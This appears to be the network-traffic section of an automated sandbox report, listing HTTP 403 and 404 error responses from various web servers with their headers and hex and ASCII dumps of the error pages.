                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:50:53 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: MoS2yhnj/6YT4RrA9Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:50:53 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: RuA4pmWb/mh7pEJaQData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:53 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:51:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eYmY3z8uIbI74mwXp14RUPR7f3v3iMertNNwf0ZwhnH1rbB9nAaUEHfQ9DZE1C%2BNcGXYVebJj0eUAy%2F%2F%2FgLOXR2MSJoZXu4ZQsTb%2BEIyiYVw78tojkON097aRq2y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8137186268dd0fc1-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:53 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: HXR2QYc2XBOIxYXpEjCVHw==,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yxX-Wix-Request-Id: 1696859453.996316757944515518X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:54 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:21:02 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
